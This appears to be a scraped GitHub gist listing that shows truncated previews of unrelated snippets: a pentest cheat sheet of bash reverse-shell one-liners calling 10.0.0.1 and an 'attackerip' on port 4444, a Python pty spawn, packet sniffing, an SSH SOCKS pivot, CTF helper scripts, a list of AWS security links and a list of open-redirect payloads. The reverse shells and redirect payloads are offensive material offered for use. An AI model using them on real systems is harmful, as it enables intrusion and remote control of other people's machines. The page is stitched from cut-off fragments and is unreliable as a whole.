- Eindbazen "cone" writeup
- Rolf Rolle's z3 based solution to some math problem
- SMT Solvers for Software Security
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#bash | |
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
#bash alt | |
exec /bin/bash 0&0 2>&0 | |
#bash alt 2 | |
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 | |
#bash alt 3 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#get a pty through python | |
python -c 'import pty; pty.spawn("/bin/bash");' | |
#grab the user agent from the http header on port 10443 | |
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443 | |
#base64 decode a string | |
echo STRINGTODECODE | base64 --decode | |
#escape jail shell |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
Author : Cyber Security IPB | |
Date : October 28, 2016 | |
Dependencies : pwntools | |
Script ini bisa mengganti pemanggilan fungsi dari suatu binary ELF | |
(32 / 64 bit). Misalnya mengubah dari "call printf" menjadi call "puts" | |
untuk menambal celah format string exploit. Atau mengubah pemanggilan | |
fungsi yang ada di program menjadi fungsi lain. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from __future__ import division | |
import hashlib | |
import requests | |
from datetime import datetime, timedelta | |
api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}' | |
def totimestamp(dt, epoch=datetime(1970,1,1)): | |
td = dt - epoch | |
return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from concurrent.futures import ThreadPoolExecutor | |
from requests_futures.sessions import FuturesSession | |
def outp(response): | |
print(response) | |
print(response.headers) | |
print(response.text) | |
urls = [ | |
"https://www.google.com", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##SOCKS Proxy## | |
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1): | |
#Command line: | |
ssh -D 127.0.0.1:1080 10.0.0.1 | |
#~/.ssh/config: | |
Host 10.0.0.1 | |
DynamicForward 127.0.0.1:1080 | |
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
INTRO | |
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute. | |
Short Link: http://tiny.cc/awssecurity | |
Official AWS Security Resources | |
* Security Blog - http://blogs.aws.amazon.com/security/ | |
* Security Advisories - http://aws.amazon.com/security/security-bulletins/ | |
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf | |
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
104.16.119.221 boards.4chan.org | |
104.16.59.249 i.4cdn.org |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/http://example.com | |
/%5cexample.com | |
/%2f%2fexample.com | |
/example.com/%2f%2e%2e | |
/http:/example.com | |
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com | |
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com | |
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com | |
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com | |
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com |
OlderNewer